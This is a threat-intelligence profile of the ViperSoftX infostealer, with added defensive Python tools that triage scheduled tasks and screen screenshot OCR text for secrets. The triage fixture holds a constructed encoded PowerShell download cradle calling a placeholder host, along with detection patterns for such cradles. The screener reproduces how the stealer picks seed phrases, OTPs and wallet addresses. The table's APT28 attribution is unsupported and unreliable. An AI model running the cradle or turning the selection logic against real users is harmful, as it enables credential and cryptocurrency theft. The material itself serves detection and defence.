| ViperSoftX | |
| --- | --- |
| Type of Malware | Infostealer |
| Date of initial activity | 2020 |
| Targeted Countries | United States |
| Additional Names | VenomSoftX |
| Associated Groups | APT28 |
| Motivation | Data Theft |
| Attack Vectors | Web Browsing |
| Targeted Systems | Windows |
| Type of Information Stolen | Login credentials |
Overview
ViperSoftX is an evolving malware family first documented by Fortinet in 2020. It is typically distributed disguised as legitimate software, most often cracks or key generators for popular applications. Once on a system it gives the operators remote command execution and quietly harvests sensitive data, with a particular focus on cryptocurrency. Its steady adoption of new techniques is why it remains a concern for defenders and why ongoing vigilance is warranted.
The core of ViperSoftX is persistent access: it stays resident on the infected system so the operators can issue commands and collect data over an extended period. It spreads through deceptive downloads and phishing campaigns, relying on users' willingness to run pirated software. Once installed it can deploy further payloads, such as remote access trojans (RATs) and infostealers, which let the operators control the machine remotely and collect cryptocurrency wallet addresses, passwords and other confidential data.
Recent iterations show a clear change in tradecraft. Early samples were JavaScript-based; newer ones use PowerShell scripts, which broaden what the malware can do and make it harder to detect. They also bring in Tesseract, an open-source optical character recognition (OCR) engine, to extract text from image files on the infected system. That extends the targeting to users who keep critical information as screenshots, such as cryptocurrency recovery phrases or authentication tokens.
As ViperSoftX continues to evolve, its impact on individuals and organizations has become increasingly severe. The malware’s capacity to operate stealthily while executing complex tasks underscores the importance of robust cybersecurity measures and user education. By understanding the tactics, techniques, and procedures employed by ViperSoftX, users can better defend themselves against this formidable threat. As the landscape of cybercrime shifts and adapts, ongoing awareness and proactive measures are essential to mitigate the risks associated with malware like ViperSoftX.
Targets
Information
Individuals
How they operate
Initial Access and Execution
ViperSoftX typically gains initial access through deceptive means, often masquerading as cracks or key generators for popular software. Once a user unknowingly downloads and executes the infected file, the malware deploys itself onto the system. Unlike its earlier versions, which primarily utilized JavaScript for execution, recent iterations have shifted to PowerShell scripts. This transition allows ViperSoftX to carry out commands more stealthily, leveraging PowerShell’s capabilities to bypass traditional security measures and execute additional malicious payloads.
Upon execution, ViperSoftX registers scheduled tasks in the Task Scheduler so that it is relaunched after reboots without any user interaction. In analysed samples the dropper executable, commonly named "win32.exe", carries further components, including secondary executables named "Svchost.exe" and "System32.exe" (names chosen to blend in with legitimate Windows binaries). These components establish the foothold and keep the malware running after the dropper itself has exited.
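A triage script for the persistence mechanism just described, added here as an example and not code from ViperSoftX or from any vendor report: it parses Task Scheduler task definitions (the XML that Windows keeps under C:\Windows\System32\Tasks) and flags tasks that launch PowerShell with evasion flags or an -EncodedCommand payload, or that run an executable from a user-writable directory. The three task definitions, the encoded payload and the host c2.invalid are constructed for this example.

```python
"""Triage Windows Task Scheduler XML for PowerShell-based persistence.

Added example, not ViperSoftX code. Windows stores one XML file per task
under C:\\Windows\\System32\\Tasks; this parses that schema and flags the
patterns the text describes. All task definitions below are constructed.
"""
import base64
import re
import xml.etree.ElementTree as ET

# Constructed payload an operator would hide behind -EncodedCommand
# (powershell.exe expects base64 of UTF-16LE). c2.invalid is a placeholder.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/stage')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

TASK_NS = 'xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"'
SAMPLE_TASKS = {  # constructed task files; XML declaration omitted
    "Updater": f"""<Task version="1.2" {TASK_NS}>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-nop -w hidden -ep bypass -enc {ENCODED}</Arguments>
  </Exec></Actions>
</Task>""",
    "Svchost": f"""<Task version="1.2" {TASK_NS}>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Users\\alice\\AppData\\Roaming\\Svchost.exe</Command>
  </Exec></Actions>
</Task>""",
    "VendorMaint": f"""<Task version="1.2" {TASK_NS}>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe</Command>
    <Arguments>-File "C:\\Program Files\\Vendor\\maint.ps1"</Arguments>
  </Exec></Actions>
</Task>""",
}

SUSPICIOUS = [  # (label, regex) checked against arguments plus decoded payload
    ("hidden window", r"-(?:w|windowstyle)\s+hidden"),
    ("execution policy bypass", r"-(?:ep|ex|exec|executionpolicy)\s+bypass"),
    ("no profile", r"-(?:nop|noprofile)\b"),
    ("download cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b"),
    ("inline invocation", r"invoke-expression|\biex\b"),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
PS_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:AppData|Temp|ProgramData|Users\\Public)\\", re.I)


def decode_encoded_command(args):
    """Return the plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_RE.search(args)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def triage_task(name, xml_text):
    """Return {'name', 'triggers', 'findings'} for one task definition."""
    root = ET.fromstring(xml_text.strip())
    for el in root.iter():                      # drop the task namespace
        el.tag = el.tag.rsplit("}", 1)[-1]
    trig = root.find("Triggers")
    triggers = [t.tag for t in trig] if trig is not None else []
    findings = []
    for ex in root.iter("Exec"):
        cmd = (ex.findtext("Command") or "").strip()
        args = (ex.findtext("Arguments") or "").strip()
        if USER_WRITABLE_RE.search(cmd):
            findings.append(f"executable in user-writable path: {cmd}")
        if not PS_RE.search(cmd):
            continue
        decoded = decode_encoded_command(args)
        if decoded is not None:
            findings.append(f"decoded -EncodedCommand: {decoded}")
        haystack = args + " " + (decoded or "")  # cradle is invisible until decoded
        for label, pat in SUSPICIOUS:
            if re.search(pat, haystack, re.I):
                findings.append(f"powershell {label}")
    return {"name": name, "triggers": triggers, "findings": findings}


def triage_all(tasks):
    """Triage every task and keep only those with findings."""
    results = [triage_task(n, x) for n, x in tasks.items()]
    return [r for r in results if r["findings"]]


if __name__ == "__main__":
    for r in triage_all(SAMPLE_TASKS):
        print(r["name"], r["triggers"])
        for f in r["findings"]:
            print("  -", f)
```

On a live host, feed it the files under C:\Windows\System32\Tasks or the output of schtasks /query /xml; the same Command and Arguments fields appear in Security event 4698 (scheduled task created) if task-creation auditing is enabled. Decoding -EncodedCommand is the step that matters: the download cradle in the Updater task is invisible in the raw arguments.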
Data Collection and Exfiltration
One of the most notable features of ViperSoftX is its ability to collect sensitive information from infected machines. This malware strain is equipped with capabilities to harvest data related to cryptocurrency wallets, including addresses and private keys. For this purpose, it may check for the presence of password managers like “KeePass 2” and “1Password,” further enhancing its data-gathering capabilities.
The latest versions of ViperSoftX integrate a particularly sophisticated technique involving the use of the open-source Optical Character Recognition (OCR) engine, Tesseract. This allows the malware to scan image files on the infected system for strings that may contain sensitive information. Tesseract identifies text within images and extracts it for further analysis. If the extracted strings contain phrases related to passwords, one-time passwords (OTPs), or cryptocurrency wallet addresses, the malware will exfiltrate those images to the attackers’ command and control (C&C) servers. This method illustrates a clear focus on targeting users who may store critical information in image formats, leveraging advanced image processing techniques to facilitate data theft.
Installation of Additional Malware
ViperSoftX is not just a standalone threat; it often acts as a facilitator for other malicious strains. Once installed, it can be used to deploy additional malware, such as Quasar RAT and TesseractStealer. Quasar RAT is an open-source remote access trojan that enables attackers to gain full control over the infected system, allowing for real-time surveillance, file uploads/downloads, and keylogging activities. The seamless installation of such additional malware highlights ViperSoftX’s role as a versatile tool in the cybercriminal toolkit, allowing attackers to expand their foothold on compromised systems.
In the case of TesseractStealer, its integration showcases how ViperSoftX not only collects information but also enhances its data exfiltration capabilities by utilizing OCR technology. TesseractStealer searches for common image file formats and systematically extracts strings from these files, particularly focusing on sensitive cryptocurrency information. The targeted strings are meticulously chosen, often referencing wallet generation phrases and security instructions, demonstrating the malware’s strategic design in aiming for high-value targets.
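The selection logic described for TesseractStealer above and in the OCR paragraph before it, turned into an audit tool and added here as an example (it is not the malware's code and not a vendor tool): it takes text already extracted from screenshots and applies the checks the text describes, credential and OTP keywords, Bitcoin and Ethereum addresses (legacy Bitcoin addresses are checksum-verified so random strings are not reported), and runs of seed-phrase-shaped words, so a defender can find which images in a screenshot folder would be worth stealing. The OCR output, the addresses and the 12-word BIP-39 subset are constructed for the example; the wordlist parameter is meant to take the full 2048-word BIP-39 list.

```python
"""Screen OCR output for the strings an OCR-equipped stealer selects.

Added example, not TesseractStealer's code. Input is text already pulled
from screenshots (by Tesseract or anything else); the OCR text, addresses
and wordlist subset below are constructed for illustration.
"""
import hashlib
import re

KEYWORDS = re.compile(
    r"\b(?:password|passwd|pwd|otp|one[- ]time|2fa|backup codes?|recovery"
    r"|seed|mnemonic|secret phrase|private key)\b", re.I)
OTP_WORDS = re.compile(r"\b(?:otp|one[- ]time|code)\b", re.I)
DIGITS_RE = re.compile(r"\b\d{6,8}\b")
BTC_RE = re.compile(r"\b(?:bc1[ac-hj-np-z02-9]{25,62}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b")
ETH_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def _checksum(payload):
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


def b58check_encode(payload):
    """Base58Check-encode a version+hash160 payload (used to build samples)."""
    data = payload + _checksum(payload)
    n = int.from_bytes(data, "big")
    digits = ""
    while n:
        n, r = divmod(n, 58)
        digits = B58[r] + digits
    return "1" * (len(data) - len(data.lstrip(b"\x00"))) + digits


def b58check_valid(addr):
    """True if addr decodes to 25 bytes whose trailing 4-byte checksum matches."""
    n = 0
    for c in addr:
        i = B58.find(c)
        if i < 0:
            return False
        n = n * 58 + i
    pad = len(addr) - len(addr.lstrip("1"))
    data = b"\x00" * pad + n.to_bytes((n.bit_length() + 7) // 8, "big")
    return len(data) == 25 and _checksum(data[:21]) == data[21:]


def seed_phrase_run(text, wordlist=None):
    """Longest per-line run of seed-shaped words (3-8 lowercase letters), with
    list numbering like '7.' or '7)' ignored. Supplying a BIP-39 wordlist
    requires each word to be in it, which removes most false positives."""
    best = 0
    for line in text.splitlines():
        run = 0
        for tok in line.split():
            w = re.sub(r"^\d{1,2}[.)]?", "", tok).strip(".,;:").lower()
            if not w:                      # bare numbering token
                continue
            ok = re.fullmatch(r"[a-z]{3,8}", w) is not None
            run = run + 1 if ok and (wordlist is None or w in wordlist) else 0
            best = max(best, run)
    return best


def classify(text, wordlist=None):
    """Return sorted labels describing sensitive content in one image's OCR text."""
    labels = set()
    if KEYWORDS.search(text):
        labels.add("credential-keyword")
    if DIGITS_RE.search(text) and OTP_WORDS.search(text):
        labels.add("otp-code")
    # bech32 (bc1...) accepted on shape only; its checksum is not implemented here
    if any(m.startswith("bc1") or b58check_valid(m) for m in BTC_RE.findall(text)):
        labels.add("btc-address")
    if ETH_RE.search(text):
        labels.add("eth-address")
    if seed_phrase_run(text, wordlist) >= 12:
        labels.add("seed-phrase")
    return sorted(labels)


def scan_images(ocr_results, wordlist=None):
    """Map image name -> labels, keeping only images a stealer would pick."""
    return {n: c for n, t in ocr_results.items() if (c := classify(t, wordlist))}


VALID_BTC = b58check_encode(b"\x00" + b"\x11" * 20)          # constructed, checksum OK
BAD_BTC = VALID_BTC[:-1] + ("2" if VALID_BTC[-1] != "2" else "3")  # last digit damaged
ETH_ADDR = "0x" + "ab" * 20                                  # constructed
# First 12 of the 2048 English BIP-39 words; load the full list in practice.
BIP39_SUBSET = frozenset("abandon ability able about above absent absorb "
                         "abstract absurd abuse access accident".split())
SAMPLE_OCR = {  # constructed OCR output keyed by image name
    "IMG_0421.png": "Recovery phrase - write these 12 words down\n1. abandon 2. ability "
                    "3. able 4. about 5. above 6. absent 7. absorb 8. abstract 9. absurd "
                    "10. abuse 11. access 12. accident",
    "receipt.png": f"Payment received to {VALID_BTC} on 2024-05-02 amount 0.013 BTC",
    "slack.png": f"pls send the refund to {BAD_BTC} thx",
    "tx.png": f"Sent 0.5 ETH to {ETH_ADDR}",
    "notes.png": "Team offsite agenda: intro, roadmap review, lunch, demos, retro, "
                 "planning session, wrap",
    "vpn.png": "Your one-time code is 482913. Do not share this OTP with anyone.",
}

if __name__ == "__main__":
    for name, labels in scan_images(SAMPLE_OCR, BIP39_SUBSET).items():
        print(name, labels)
```

Without a wordlist, notes.png is flagged as a seed phrase because twelve consecutive short lowercase words look like one; with the wordlist it is not. That is the trade-off a stealer faces too: it can either send every borderline image and be noisy on the wire, or embed the wordlist and be precise.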
MITRE Tactics and Techniques
Initial Access (TA0001): ViperSoftX often gains entry into systems through malicious downloads disguised as cracks or keygens for legitimate software.
Execution (TA0002): It uses PowerShell scripts for execution, enabling it to run commands and install additional payloads, including remote access trojans (RATs).
Persistence (TA0003): The malware establishes persistence through Task Scheduler, registering scripts to run automatically at specified intervals.
Privilege Escalation (TA0004): It may attempt to gain higher privileges on the infected system to execute its commands without restrictions.
Defense Evasion (TA0005): ViperSoftX employs various evasion techniques, including encryption of communication data and the use of PowerShell to bypass security measures.
Credential Access (TA0006): The malware is designed to capture sensitive information, such as cryptocurrency wallet addresses and passwords.
Discovery (TA0007): It can gather system information, such as user names and installed security products, to tailor its attacks.
Command and Control (TA0011): ViperSoftX communicates with command and control (C&C) servers to receive instructions and to send back stolen data.
Exfiltration (TA0010): The malware exfiltrates sensitive information, particularly cryptocurrency-related data and the images in which Tesseract found passwords, OTPs or wallet strings.
Impact (TA0040): The ultimate goal of ViperSoftX is to steal financial information and potentially disrupt the user’s access to their cryptocurrency assets.